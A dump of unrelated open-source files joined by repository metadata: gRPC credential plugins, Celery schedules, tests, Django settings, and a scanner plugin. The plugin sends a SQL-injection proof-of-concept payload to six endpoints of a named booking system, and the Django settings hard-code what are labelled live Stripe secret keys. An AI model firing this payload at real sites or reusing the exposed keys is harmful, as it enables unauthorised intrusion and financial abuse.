        self.called = False
        self.exception = None
class _AuthMetadataPluginCallback(grpc.AuthMetadataPluginCallback):
    """Adapter handed to user plugins; forwards their result to the Cython layer.

    Enforces the AuthMetadataPlugin contract: the callback may fire at most
    once, and never after the plugin has already raised.
    """

    def __init__(self, state, callback):
        self._state = state        # shared _CallbackState guarding invocation
        self._callback = callback  # Cython-level completion callback

    def __call__(self, metadata, error):
        with self._state.lock:
            if self._state.exception is None:
                if self._state.called:
                    raise RuntimeError(
                        'AuthMetadataPluginCallback invoked more than once!')
                else:
                    self._state.called = True
            else:
                raise RuntimeError(
                    'AuthMetadataPluginCallback raised exception "{}"!'.format(
                        self._state.exception))
        # Outside the lock: report success, or translate the plugin-supplied
        # error into an internal status.
        if error is None:
            self._callback(metadata, cygrpc.StatusCode.ok, None)
        else:
            self._callback(None, cygrpc.StatusCode.internal,
                           _common.encode(str(error)))
class _Plugin(object):
    """Callable invoked by the Cython layer once per metadata request."""

    def __init__(self, metadata_plugin):
        self._metadata_plugin = metadata_plugin

    def __call__(self, service_url, method_name, callback):
        context = _AuthMetadataContext(
            _common.decode(service_url), _common.decode(method_name))
        callback_state = _CallbackState()
        try:
            self._metadata_plugin(context,
                                  _AuthMetadataPluginCallback(
                                      callback_state, callback))
        except Exception as exception:  # pylint: disable=broad-except
            _LOGGER.exception(
                'AuthMetadataPluginCallback "%s" raised exception!',
                self._metadata_plugin)
            with callback_state.lock:
                callback_state.exception = exception
                if callback_state.called:
                    # The plugin completed the callback before raising;
                    # nothing more to report.
                    return
            # The plugin raised before ever invoking the callback: complete
            # the call with an internal error ourselves.
            callback(None, cygrpc.StatusCode.internal,
                     _common.encode(str(exception)))
def metadata_plugin_call_credentials(metadata_plugin, name):
    """Wrap *metadata_plugin* into grpc.CallCredentials.

    When *name* is None, fall back to the plugin's ``__name__`` or, for
    callable instances without one, its class name.
    """
    if name is None:
        try:
            effective_name = metadata_plugin.__name__
        except AttributeError:
            effective_name = metadata_plugin.__class__.__name__
    else:
        effective_name = name
    return grpc.CallCredentials(
        cygrpc.MetadataPluginCallCredentials(
            _Plugin(metadata_plugin), _common.encode(effective_name)))
|
[
"parthpankajtiwary@gmail.com"
] |
parthpankajtiwary@gmail.com
|
7a4ccc2502dab8ff8f1958d5055642f4c92c18ce
|
bd9a09a3f1a8b2b5166c540ada93cc5b30591605
|
/scanner/plugins/cms/piaoyou/piaoyou_six2_sqli.py
|
eec921a1b177ff73dbc2f527350a99da77615bf5
|
[
"MIT"
] |
permissive
|
iceyhexman/onlinetools
|
3cb6e349fc30c515f96429abeab5fbcc430ac0cc
|
61f2df7ff8e6ad97ca7901728c3ab749679a2bd0
|
refs/heads/master
| 2023-08-06T19:31:51.328657
| 2022-10-28T04:01:38
| 2022-10-28T04:01:38
| 119,565,769
| 1,662
| 358
|
MIT
| 2023-03-31T14:34:13
| 2018-01-30T16:51:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,390
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 票友机票预订系统6处SQL注入2(绕过)
referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
author: Lucifer
description: multi sqli。
'''
import sys
import requests
class piaoyou_six2_sqli_BaseVerify:
    """PoC verifier for six SQL-injection points (filter bypass) in the
    Piaoyou flight-booking system (ref: wooyun-2015-0116851).

    Appends an error-based payload that makes the backend compute
    md5('1234'); seeing that digest in the response proves the injected
    SQL expression was evaluated.
    """

    def __init__(self, url):
        # Base URL of the target, e.g. "http://example.com".
        self.url = url

    def run(self):
        """Probe each known endpoint; return a finding string or a timeout note."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Known injectable endpoints, each taking a numeric 'id' parameter.
        urls = ["/Parmset/sms_mb_edit.aspx?id=1",
                "/Sales/meb_edit.aspx?id=1",
                "/Sales/meb_his.aspx?id=1",
                "/Other/hotel_edit.aspx?id=1",
                "/Visa/visa_edit.aspx?id=1",
                "/Visa/gjqz_add.aspx?id=214"]
        try:
            for url in urls:
                vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                # md5('1234') digest: its presence means the payload executed.
                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                    return "[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl
        # NOTE(review): bare except also swallows non-network errors.
        except:
            return "[-]connect timeout"
if __name__ == "__main__":
    # Usage: python piaoyou_six2_sqli.py <base_url>
    testVuln = piaoyou_six2_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
|
[
"834430486@qq.com"
] |
834430486@qq.com
|
f0af40b807555df49c70d1410197dbfebf56faea
|
46d2bb5c6d2ea91ac8a3fda0168cc99501b1abe4
|
/middleware/client_test.py
|
23a21e179175a2942d8e6f0cd79747b4b0f65bdf
|
[
"Apache-2.0"
] |
permissive
|
Time1ess/VES
|
2fe0a1c3371e243a377ad6a31df5d3b4651ddf4d
|
fe608b8ae469f81cc23b1ea30f02a1e68fac13ee
|
refs/heads/master
| 2021-01-18T21:36:21.864535
| 2016-06-15T12:21:42
| 2016-06-15T12:21:42
| 52,199,990
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/python
# coding:utf-8
# Author: David
# Email: youchen.du@gmail.com
# Created: 2016-04-04 14:10
# Last modified: 2016-04-11 10:01
# Filename: client_test.py
# Description:
import socket
import time
import sys
import select
from random import randint
def Check_Identity(data):
    """Return True only when the broadcast payload identifies a VES server."""
    if data == "VES":
        return True
    return False

# Role selection: "v" = video source, anything else = display client.
if not sys.argv[1]:
    name = raw_input("Enter type(v for video,d for display):")
else:
    name = sys.argv[1]

# Listen for the middleware's UDP broadcast on port 8089 to discover its host.
broad_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #
broad_sock.bind(('', 8089))
data = None
addr = None
while True:
    data, addr = broad_sock.recvfrom(4096)
    if Check_Identity(data) is True:
        break
broad_sock.close()
host = addr[0]
print 'Get broadcast message from host:', host
# Video clients connect to TCP 8090, display clients to 8092.
port = 8090 if name == "v" else 8092
ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send socket
ss.connect((host, port))
client = None
if name == "v":
    # Video role also accepts a reverse TCP connection from the middleware.
    sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sr.bind(('', 8091))
    sr.listen(1)
    client, addr = sr.accept()
    print 'Get connected from middleware'
disconnected = False
while True:
    if name == "v" and not disconnected:
        # Poll the middleware connection without blocking the send loop.
        rs, ws, es = select.select([client], [], [], 0.1)
        for r in rs:
            try:
                msg = r.recv(4096)
                disconnected = not msg
            except:
                disconnected = True
            if r is client:
                if disconnected:
                    print 'Middleware system disconnectd.'
                    break
                else:
                    print '[Middleware msg] ', msg
    try:
        # Send a random (x, y, z) orientation tuple roughly every 100 ms.
        msg = repr(tuple([randint(0, 360) for x in xrange(3)]))
        ss.send(msg)
    except:
        print 'Socket close.'
        break
    time.sleep(0.1)
|
[
"youchen.du@gmail.com"
] |
youchen.du@gmail.com
|
5e9365cd8fcdc3c33017a4fb7808aa0e14bf48f8
|
2e3e256bcc0086a61cbb0e082dc61290196e35d2
|
/dragon/common/custom_backend_auth.py
|
c06f172b49bf3edcc9fa4ad9cf008c2682719502
|
[
"Apache-2.0"
] |
permissive
|
miradam/openstack-workload-disaster-recovery
|
79dcdb15ebf95d89157751c750a5dbab1557b942
|
854a3952bb9278cc08017ada97ff150b12b1c687
|
refs/heads/master
| 2020-03-24T15:36:46.808591
| 2016-12-15T12:32:17
| 2016-12-15T12:32:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,087
|
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Middleware for authenticating against custom backends.
"""
import logging
from dragon.openstack.common import local
from dragon.rpc import client as rpc_client
import webob.exc
LOG = logging.getLogger(__name__)
class AuthProtocol(object):
    """WSGI middleware that authenticates each request against the engine's
    custom backend before passing it downstream."""

    def __init__(self, app, conf):
        self.conf = conf
        self.app = app

    def __call__(self, env, start_response):
        """
        Handle incoming request.

        Authenticate and send downstream on success. Reject request if
        we can't authenticate.
        """
        LOG.debug('Authenticating user token')
        # The request context was stashed in thread-local storage upstream.
        context = local.store.context
        engine = rpc_client.EngineClient()
        authenticated = engine.authenticated_to_backend(context)
        if authenticated:
            return self.app(env, start_response)
        else:
            return self._reject_request(env, start_response)

    def _reject_request(self, env, start_response):
        """
        Reject the request as unauthorized.

        :param env: wsgi request environment
        :param start_response: wsgi response callback
        :returns: HTTPUnauthorized http response
        """
        resp = webob.exc.HTTPUnauthorized("Backend authentication failed", [])
        return resp(env, start_response)
def filter_factory(global_conf, **local_conf):
    """Paste filter factory: merge global and local conf, wrap apps in AuthProtocol."""
    merged_conf = global_conf.copy()
    merged_conf.update(local_conf)

    def auth_filter(app):
        # Every wrapped app shares the merged configuration.
        return AuthProtocol(app, merged_conf)

    return auth_filter
|
[
"OSHRITF@il.ibm.com"
] |
OSHRITF@il.ibm.com
|
a216e6e27226559c893a544e64f063b65a73dc33
|
e3bbbb5018baad3cd2a2daf10e315a2e12aec974
|
/ichnaea/async/schedule.py
|
129cd2fffdcfed4b50627ec2d05e94d081463a88
|
[
"Apache-2.0"
] |
permissive
|
ingle/ichnaea
|
5980de0532b012af7e48fa89bad7516adb84d24e
|
ed467538b6e61cf7c7921cd4aacb32ee039d13aa
|
refs/heads/master
| 2021-01-17T14:23:32.369530
| 2016-01-12T20:29:38
| 2016-01-12T20:29:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,476
|
py
|
"""
Contains the `Celery Beat schedule
<http://celery.rtfd.org/en/latest/userguide/periodic-tasks.html>`_.
"""
from datetime import timedelta
from celery.schedules import crontab
from ichnaea.models import (
CellShard,
DataMap,
WifiShard,
)
def celerybeat_schedule(app_config):
    """Return the celery beat schedule as a dictionary.

    The base schedule (monitoring, statistics, export pipeline) is always
    present; per-shard update tasks are added for every cell, datamap and
    wifi shard, and the export/import tasks are added only when the
    corresponding config sections exist in *app_config*.
    """
    sections = app_config.sections()
    schedule = {

        # Monitoring
        'monitor-queue-size': {
            'task': 'ichnaea.data.tasks.monitor_queue_size',
            'schedule': timedelta(seconds=60),
            'options': {'expires': 57},
        },
        'monitor-api-users': {
            'task': 'ichnaea.data.tasks.monitor_api_users',
            'schedule': timedelta(seconds=600),
            'options': {'expires': 570},
        },
        'monitor-api-key-limits': {
            'task': 'ichnaea.data.tasks.monitor_api_key_limits',
            'schedule': timedelta(seconds=600),
            'options': {'expires': 570},
        },

        # Statistics
        'update-statcounter': {
            'task': 'ichnaea.data.tasks.update_statcounter',
            'args': (1, ),
            'schedule': crontab(minute=3),
            'options': {'expires': 2700},
        },
        'update-statregion': {
            'task': 'ichnaea.data.tasks.update_statregion',
            'schedule': crontab(minute=5),
            'options': {'expires': 2700},
        },

        # Data Pipeline
        'schedule-export-reports': {
            'task': 'ichnaea.data.tasks.schedule_export_reports',
            'schedule': timedelta(seconds=8),
            'options': {'expires': 15},
        },
        'update-cellarea': {
            'task': 'ichnaea.data.tasks.update_cellarea',
            'schedule': timedelta(seconds=8),
            'args': (100, ),
            'options': {'expires': 15},
        },
        'update-cellarea-ocid': {
            'task': 'ichnaea.data.tasks.update_cellarea_ocid',
            'schedule': timedelta(seconds=9),
            'args': (100, ),
            'options': {'expires': 15},
        },
        'update-score': {
            'task': 'ichnaea.data.tasks.update_score',
            'args': (250, ),
            'schedule': timedelta(seconds=9),
            'options': {'expires': 10},
        },

    }

    # One short-interval update task per cell shard.
    for shard_id in CellShard.shards().keys():
        schedule.update({
            'update-cell-' + shard_id: {
                'task': 'ichnaea.data.tasks.update_cell',
                'schedule': timedelta(seconds=7),
                'args': (500, shard_id),
                'options': {'expires': 10},
            }
        })

    # One update task per datamap shard.
    for shard_id in DataMap.shards().keys():
        schedule.update({
            'update-datamap-' + shard_id: {
                'task': 'ichnaea.data.tasks.update_datamap',
                'args': (500, shard_id),
                'schedule': timedelta(seconds=14),
                'options': {'expires': 20},
            },
        })

    # One update task per wifi shard.
    for shard_id in WifiShard.shards().keys():
        schedule.update({
            'update-wifi-' + shard_id: {
                'task': 'ichnaea.data.tasks.update_wifi',
                'schedule': timedelta(seconds=6),
                'args': (500, shard_id),
                'options': {'expires': 10},
            }
        })

    if 'assets' in sections and app_config.get('assets', 'bucket', None):
        # only configure tasks if target bucket is configured
        schedule.update({
            'cell-export-full': {
                'task': 'ichnaea.data.tasks.cell_export_full',
                'schedule': crontab(hour=0, minute=13),
                'options': {'expires': 39600},
            },
            'cell-export-diff': {
                'task': 'ichnaea.data.tasks.cell_export_diff',
                'schedule': crontab(minute=3),
                'options': {'expires': 2700},
            },
        })

    if 'import:ocid' in sections:
        # OpenCellID import plus its monitoring task.
        schedule.update({
            'monitor-ocid-import': {
                'task': 'ichnaea.data.tasks.monitor_ocid_import',
                'schedule': timedelta(seconds=600),
                'options': {'expires': 570},
            },
            'cell-import-external': {
                'task': 'ichnaea.data.tasks.cell_import_external',
                'args': (True, ),
                'schedule': crontab(minute=52),
                'options': {'expires': 2700},
            },
        })

    return schedule
|
[
"hanno@hannosch.eu"
] |
hanno@hannosch.eu
|
8dd2e0625d7cddc0360585244105d243400bfd8c
|
62e58c051128baef9452e7e0eb0b5a83367add26
|
/x12/6010/504006010.py
|
f720a213c867cbaeb745d5d7e34ed4a67527b198
|
[] |
no_license
|
dougvanhorn/bots-grammars
|
2eb6c0a6b5231c14a6faf194b932aa614809076c
|
09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d
|
refs/heads/master
| 2021-05-16T12:55:58.022904
| 2019-05-17T15:22:23
| 2019-05-17T15:22:23
| 105,274,633
| 0
| 0
| null | 2017-09-29T13:21:21
| 2017-09-29T13:21:21
| null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
from bots.botsconfig import *
from records006010 import recorddefs
# X12 006010 transaction-set 504 grammar for the bots EDI engine:
# envelope version and segment tree (segment ID, min/max occurrences,
# nested LEVEL lists for looped segments).
syntax = {
    'version': '00601',
    'functionalgroup': 'CC',
}
structure = [
    {ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
        {ID: 'BGN', MIN: 1, MAX: 1},
        {ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
            {ID: 'N2', MIN: 0, MAX: 2},
            {ID: 'N3', MIN: 0, MAX: 2},
            {ID: 'N4', MIN: 0, MAX: 1},
            {ID: 'PER', MIN: 0, MAX: 99999},
            {ID: 'DTP', MIN: 0, MAX: 99999},
            {ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
                {ID: 'LQ', MIN: 1, MAX: 99999},
            ]},
        ]},
        {ID: 'REF', MIN: 0, MAX: 99999, LEVEL: [
            {ID: 'DTP', MIN: 0, MAX: 99999},
            {ID: 'MSG', MIN: 0, MAX: 99999},
            {ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
                {ID: 'LQ', MIN: 1, MAX: 99999},
            ]},
        ]},
        {ID: 'SE', MIN: 1, MAX: 1},
    ]}
]
|
[
"doug.vanhorn@tagglogistics.com"
] |
doug.vanhorn@tagglogistics.com
|
9c0840e858c444ea844208b24a2948f9ad7256f6
|
aad4481e8a54e311982d638c1b42a86180726970
|
/examples/event-loop-stuff/timeout-clock.py
|
b5a2076df4b5ee032662cafab72effec9061d0ae
|
[
"Unlicense",
"Zlib"
] |
permissive
|
jiangguoqing/tkinter-tutorial
|
5639b11cfc2f339df3776410dbd7078ee07fac54
|
c6fee61ee915cf0894125e5b5eeb7249237d3a6b
|
refs/heads/master
| 2021-05-05T12:02:13.912298
| 2017-06-18T10:51:33
| 2017-06-18T10:51:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 443
|
py
|
import tkinter as tk
import time


def update_clock():
    """Refresh the label and reschedule this callback in one second.

    This must return quickly; `after` is Tk's idiomatic repeating timer,
    so no blocking loop is needed.
    """
    label['text'] = time.asctime()
    root.after(1000, update_clock)


root = tk.Tk()
label = tk.Label(root, text='0')
label.pack()
update_clock()  # kick off the repeating update — without this call nothing ticks
root.geometry('200x200')
root.mainloop()
|
[
"akuviljanen17@gmail.com"
] |
akuviljanen17@gmail.com
|
cd515ac2fb82afb70c385e634c68f7f523290d90
|
1097ed333a4000634e68a590ee6ffc6129ae61e3
|
/287.寻找重复数.py
|
f7574fcf8c3ef85cc24ac1beab25979bd36b19d0
|
[
"MIT"
] |
permissive
|
AutuanLiu/Code-Storm2019
|
1bbe890c7ca0d033c32348173bfebba612623a90
|
8efc7c5475fd888f7d86c3b08a3c1c9e55c1ac30
|
refs/heads/master
| 2020-04-23T07:03:08.975232
| 2019-10-24T08:56:26
| 2019-10-24T08:56:26
| 170,995,032
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,679
|
py
|
#
# @lc app=leetcode.cn id=287 lang=python3
#
# [287] 寻找重复数
#
# https://leetcode-cn.com/problems/find-the-duplicate-number/description/
#
# algorithms
# Medium (60.60%)
# Likes: 246
# Dislikes: 0
# Total Accepted: 17.2K
# Total Submissions: 28.4K
# Testcase Example: '[1,3,4,2,2]'
#
# 给定一个包含 n + 1 个整数的数组 nums,其数字都在 1 到 n 之间(包括 1 和
# n),可知至少存在一个重复的整数。假设只有一个重复的整数,找出这个重复的数。
#
# 示例 1:
#
# 输入: [1,3,4,2,2]
# 输出: 2
#
#
# 示例 2:
#
# 输入: [3,1,3,4,2]
# 输出: 3
#
#
# 说明:
#
#
# 不能更改原数组(假设数组是只读的)。
# 只能使用额外的 O(1) 的空间。
# 时间复杂度小于 O(n^2) 。
# 数组中只有一个重复的数字,但它可能不止重复出现一次。
#
#
#
# 首先进行排序
# 遍历数组 如果下一个位置的数值和当前值相等 则重复
# class Solution:
# def findDuplicate(self, nums: List[int]) -> int:
# nums = sorted(nums) # 这里开辟了新的空间 存储副本
# n = len(nums)
# for i in range(n-1):
# if nums[i] == nums[i + 1]:
# return nums[i]
# return -1
class Solution(object):
    """LeetCode 287: find the duplicate via Floyd's tortoise-and-hare.

    The array is read as a linked list where index i points to nums[i];
    the duplicated value is the entrance of the resulting cycle.
    O(n) time, O(1) extra space, input array is never modified.
    """

    def findDuplicate(self, nums):
        # Phase 1: one hop vs. two hops per step until the pointers meet
        # somewhere inside the cycle.
        tortoise = hare = 0
        while True:
            tortoise = nums[tortoise]
            hare = nums[nums[hare]]
            if tortoise == hare:
                break
        # Phase 2: a fresh pointer from index 0 meets the tortoise exactly
        # at the cycle entrance, i.e. the duplicated value.
        probe = 0
        while True:
            tortoise = nums[tortoise]
            probe = nums[probe]
            if tortoise == probe:
                return tortoise
|
[
"autuanliu@163.com"
] |
autuanliu@163.com
|
56bb1b8a3d238c6c89226c5276b91e8649ac0852
|
660e3a2bb5f127908549d52ebc62d0d67725f832
|
/Algorithm_python/최소반복.py
|
289ccfc40280f63b62c7f53a788273646c84b529
|
[] |
no_license
|
dygksquf5/python_study
|
b56f8548bea7e31a484301bb97ddefe44d931c80
|
282126b0104dae9f9f8f63e613cc968a2f998ef1
|
refs/heads/master
| 2023-02-21T03:46:16.673962
| 2021-01-24T14:08:47
| 2021-01-24T14:08:47
| 294,593,923
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
# Original Korean comment: "the given numbers are large, so every remaining
# test case errors out".
def solution(arr):
    answer = 0
    # NOTE(review): len(set(str(arr))) counts distinct *characters* of the
    # list's repr (digits, brackets, commas, spaces), not distinct values of
    # arr — this sizing looks wrong and is presumably why large inputs fail
    # with IndexError; len(set(arr)) or max(arr) seems intended. TODO confirm.
    id = [0] * len(set(str(arr)))
    visited = [False] * len(id)
    for i in range(len(arr)):
        # first sighting of this value: remember the index it appeared at
        if not visited[arr[i] - 1]:
            id[arr[i] - 1] = i
            visited[arr[i] - 1] = True
            continue
        # repeat sighting: answer is overwritten (not min-accumulated) each
        # time — NOTE(review): confirm this matches the intended semantics.
        if visited[arr[i] - 1]:
            answer = min(i - id[arr[i] - 1], id[arr[i] - 1])
            id[arr[i] - 1] = max(i - id[arr[i] - 1], id[arr[i] - 1])
    # answer == 0 is treated as "no repetition found"
    if answer == 0:
        return -1
    else:
        return answer
# answer = []
# id = collections.defaultdict(list)
# for i in sorted(set(arr)):
# id[i] = [dup for dup in range(len(arr)) if arr[dup] == i]
|
[
"66229916+dygksquf5@users.noreply.github.com"
] |
66229916+dygksquf5@users.noreply.github.com
|
eb884160b46e9b642bf272c7dd14832b474646d7
|
b5e4958bd1c4770297108947e7b7441020b2e9cc
|
/topi/tests/python_cpp/test_topi_relu.py
|
f214266351210bcd11b71be64cdebdfc98b25ba6
|
[
"Apache-2.0"
] |
permissive
|
Markz2z/tvm
|
06a20dcdf76111b64242940323ba998432ffbffb
|
3921b938c2a14017c2624f149983e86a7f9a4e94
|
refs/heads/master
| 2021-09-07T22:13:37.234511
| 2018-02-27T23:14:58
| 2018-02-27T23:14:58
| 124,998,633
| 1
| 0
|
Apache-2.0
| 2018-03-13T05:45:19
| 2018-03-13T05:45:19
| null |
UTF-8
|
Python
| false
| false
| 2,070
|
py
|
"""Test code for relu activation"""
import os
import numpy as np
import tvm
import topi
from topi.util import get_const_tuple
def verify_relu(m, n, dtype):
    """Check the topi C++ relu lowering against a NumPy reference.

    Builds relu over an (m, n) placeholder of *dtype*, compiles it for each
    enabled GPU-style target and compares against a_np * (a_np > 0).
    """
    A = tvm.placeholder((m, n), name='A', dtype=dtype)
    B = topi.cpp.nn.relu(A)
    assert B.dtype == dtype

    a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
    # NumPy reference: relu(x) = x for x > 0, else 0
    b_np = a_np * (a_np > 0)

    def check_device(device):
        # skip targets that were not compiled into this TVM build
        if not tvm.module.enabled(device):
            print("Skip because %s is not enabled" % device)
            return
        print("Running on target: %s" % device)
        target = topi.cpp.TEST_create_target(device)
        # NOTE(review): the "llvm" branch below is unreachable with the
        # device list used here — confirm whether 'llvm' should be tested.
        if device == "llvm":
            s = topi.cpp.generic.schedule_injective(target, [B])
        else:
            s = topi.cpp.cuda.schedule_injective(target, [B])
        ctx = tvm.context(device, 0)
        a = tvm.nd.array(a_np, ctx)
        b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
        foo = tvm.build(s, [A, B], device, name="relu")
        foo(a, b)
        np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)

    for device in ['cuda', 'opencl', 'metal', 'rocm']:
        check_device(device)
def verify_leaky_relu(m, alpha):
    """Check the topi C++ leaky_relu lowering on the llvm target.

    Builds leaky_relu over a length-m placeholder and compares against the
    NumPy reference x for x > 0 and alpha * x for x < 0.
    """
    A = tvm.placeholder((m,), name='A')
    B = topi.cpp.nn.leaky_relu(A, alpha)
    device = "llvm"
    target = topi.cpp.TEST_create_target(device)
    s = topi.cpp.generic.schedule_injective(target, [B])

    a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
    # NumPy reference for leaky relu
    b_np = a_np * (a_np > 0) + a_np * (a_np < 0) * alpha
    ctx = tvm.cpu(0)
    a = tvm.nd.array(a_np, ctx)
    b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
    foo = tvm.build(s, [A, B], device, name="leaky_relu")
    foo(a, b)
    np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
def test_relu():
    """Exercise verify_relu across all supported float and int dtypes."""
    for dtype in ['float32', 'float64', 'int32', 'int16', 'int8', 'int64']:
        verify_relu(10, 128, dtype)


def test_leaky_relu():
    """Single smoke test for the leaky relu lowering."""
    verify_leaky_relu(100, 0.1)


if __name__ == "__main__":
    test_relu()
    test_leaky_relu()
|
[
"tqchen@users.noreply.github.com"
] |
tqchen@users.noreply.github.com
|
ed3556874e717bbaf477fea4cadc0f06772d039c
|
5e324af46c554b88b97ee26886b05c88457ff0f5
|
/core/settings/production.py
|
0514fd109ac361f269a79a6f0a4dcb5a3202ba61
|
[] |
no_license
|
doubleclickdetroit/dindintonight
|
1bda8851e49782d4dc16ca77d46e4b1f431c2b52
|
9769e1a96730b02511d25af8828b075dff5c35b5
|
refs/heads/master
| 2016-08-04T22:01:08.083566
| 2014-07-26T18:58:58
| 2014-07-26T18:58:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,383
|
py
|
"""Production settings and globals."""
from os import environ
from base import *
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
    """Return the value of the *setting* environment variable.

    A missing variable raises ImproperlyConfigured instead of a bare
    KeyError so required settings fail loudly with a readable message.
    """
    try:
        return environ[setting]
    except KeyError:
        raise ImproperlyConfigured("Set the %s env variable" % setting)
########## HOST CONFIGURATION
# See: https://docs.djangoproject.com/en/1.5/releases/1.5/#allowed-hosts-required-in-production
# NOTE(review): with DEBUG off, an empty ALLOWED_HOSTS makes Django reject
# every request — the production hostnames must be listed here.
ALLOWED_HOSTS = []
########## END HOST CONFIGURATION

########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'

# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.gmail.com')

# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')

# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', 'your_email@example.com')

# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = environ.get('EMAIL_PORT', 587)

# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME

# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True

# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL CONFIGURATION

########## DATABASE CONFIGURATION
# NOTE(review): empty here — presumably populated from the environment or a
# local override; confirm how production databases are injected.
DATABASES = {}
########## END DATABASE CONFIGURATION

########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {}
########## END CACHE CONFIGURATION

########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('SECRET_KEY')
########## END SECRET CONFIGURATION

########## STRIPE CREDIT CARD PROCESSING
# SECURITY(review): these are *live* Stripe credentials hard-coded in source
# control. They should be rotated immediately and loaded from the
# environment (e.g. get_env_setting('STRIPE_SECRET_KEY')) like SECRET_KEY.
STRIPE_SECRET_KEY = 'sk_live_oTd6djTNRxCeURqgLUYgGLl3'
STRIPE_PUBLISHABLE_KEY = 'pk_live_8zQjpc9a3HnrLCYVttDDKTMh'
########## END STRIPE CREDIT CARD PROCESSING
|
[
"rgarrison3@gmail.com"
] |
rgarrison3@gmail.com
|
f1d0e4bc2bf2a727d168359cf8886cbca2f8e324
|
25ebc03b92df764ff0a6c70c14c2848a49fe1b0b
|
/daily/20190406/example_tinyloop/06generator.py
|
d865c30ed0ec9c763671dcf57f05205d0cd393bb
|
[] |
no_license
|
podhmo/individual-sandbox
|
18db414fafd061568d0d5e993b8f8069867dfcfb
|
cafee43b4cf51a321f4e2c3f9949ac53eece4b15
|
refs/heads/master
| 2023-07-23T07:06:57.944539
| 2023-07-09T11:45:53
| 2023-07-09T11:45:53
| 61,940,197
| 6
| 0
| null | 2022-10-19T05:01:17
| 2016-06-25T11:27:04
|
Python
|
UTF-8
|
Python
| false
| false
| 240
|
py
|
def f():
    """Generator demo: yields 1 then 2, echoing whatever is sent back in.

    The pair of sent-in values is returned, surfacing to the caller as
    StopIteration.value when the generator is exhausted.
    """
    first = yield 1
    print("@", first)
    second = yield 2
    print("@", second)
    return first, second
# Drive the generator by hand: next() advances to the first yield,
# send() delivers a value into the paused `yield` expression.
itr = f()
v = next(itr)
print("!", v)
v = itr.send([v])
print("!", v)
try:
    print(itr.send([v]))
except StopIteration as e:
    # the generator's `return` value surfaces as StopIteration's args
    print(e.args)
|
[
"ababjam61+github@gmail.com"
] |
ababjam61+github@gmail.com
|
f0c660265b92498d1ba0c1172e8fe861bbba7312
|
4649cce3d8da661ddb204428e21f714a502d36f9
|
/src/ensae_teaching_cs/faq/faq_pandas.py
|
e7794b4e40526ab1f81f343648af19a2bd63b895
|
[
"MIT"
] |
permissive
|
xugonglei/ensae_teaching_cs
|
10a7b97003e7d833dd0faaae939813bf1e134575
|
f06d4ce7ea24338b5b217f6c46ff7980eac7e653
|
refs/heads/master
| 2020-04-30T11:10:47.368520
| 2015-10-29T21:41:23
